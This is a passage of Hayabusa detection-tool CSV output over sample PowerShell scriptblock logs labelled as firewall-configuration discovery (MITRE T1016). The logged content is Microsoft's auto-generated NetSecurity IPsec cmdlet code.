if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End 
{ try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeCryptoSet ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.989 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = 
$myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else 
{ $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
